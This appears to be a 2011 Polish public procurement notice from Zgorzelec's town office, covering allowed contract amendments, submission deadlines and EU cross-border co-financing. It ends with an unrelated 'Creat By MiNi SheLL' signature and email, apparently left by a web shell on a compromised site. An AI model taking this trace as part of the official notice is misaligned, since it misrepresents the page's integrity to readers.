<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewidział możliwość dokonania zmian postanowień umowy,  przy czym 
 warunki takiej zmiany Zamawiający określił  w § 12 ust. 2  projektu umowy. 
1. Zakres przewidzianych zmian:
    1) termin określony w pkt. 4 SIWZ i § 3 ust. 1 projektu umowy  ulegnie  przesunięciu w 
        przypadku wystąpienia opóźnień wynikających z:  
        a) opóźnień zawinionych przez Zamawiającego, mających wpływ na termin realizacji 
            przedmiotu umowy, w szczególności dot. przekazania terenu budowy, dokonania odbioru 
            końcowego robót,                  
        b) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym 
            wpływ na termin realizacji przedmiotu zamówienia,                  
        c) wstrzymania robót budowlanych  przez uprawnione do tego organy w 
            okolicznościach, za które Wykonawca nie ponosi odpowiedzialności,         
        
     2) Zmiana harmonogramu rzeczowego realizacji inwestycji, w przypadku zmiany 
         terminu  wykonania przedmiotu umowy, 

    3) Strony dopuszczają możliwość zamiany harmonogramu rzeczowego realizacji 
        inwestycji, z przyczyn technicznych lub technologicznych bądź wynikajacych z organizacji
        procesu inwestycyjnego (budowlanego).

     4)  Zmiana osób wskazanych w umowie z imienia i nazwiska odpowiedzialnych za 
          realizację umowy, o których mowa w § 11 ust. 1 i 2 projektu umowy, będzie możliwa 
          w każdym czasie  w trakcie związania umową pod warunkiem,  że osoby  te posiadać 
          będą co najmniej takie same uprawnienia jak osoby wskazane przez Wykonawcę 
          w ofercie.   

     5)  Zmiana Podwykonawcy możliwa będzie jedynie wtedy, gdy zakres realizowanych 
          przez Podwykonawcę robót, nie ulegnie zmianie w stosunku do zakresu robót 
          wskazanych w ofercie Wykonawcy, a które zaplanował on do realizacji przez 
          Podwykonawcę. Zmiana taka możliwa będzie jedynie na uzasadniony  wniosek 
          Wykonawcy, do którego winien załączyć projekt umowy z Podwykonawcą, przy 
          czym wymagana jest w tym przypadku pisemna zgoda Zamawiającego na zawarcie 
          przez Wykonawcę umowy z innym Podwykonawcą. 

2. W przedstawionych w punkcie 1 podpunkt 1 przypadkach wystąpienia opóźnień, strony ustalają 
     nowe terminy realizacji umowy, z tym, że okres  przesunięcia terminu realizacji przedmiotu 
     umowy równy będzie co najmniej okresowi przerwy lub postoju. 

3. Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie powstałych 
    okoliczności w formie opisowej i właściwie umotywowanej, potwierdzonej przez każdą 
    ze stron umowy. 

4. Strona ubiegająca się o zmianę umowy w w/w przypadkach, powinna zwrócić się do  
    Wykonawcy/Zamawiającego w formie pisemnej z wnioskiem,  o wprowadzenie 
    zmian  w umowie aneksem, w terminie  7 dni od daty zdarzenia uzasadnionego zmianą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.um-zgorzelec.dolnyslask.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Zgorzelec
Wydział Zamówień Publicznych
59-900 Zgorzelec ul. Domańskiego 6 pokój 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.12.2011 godzina 11:00, miejsce: Urząd Miasta Zgorzelec
59-900 Zgorzelec 
ul.  Domańskiego 7
Punkt Obsługi Interesanta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia współfinansowany przez Unię Europejską ze środków    
Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Współpracy Transgranicznej Polska-Saksonia 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com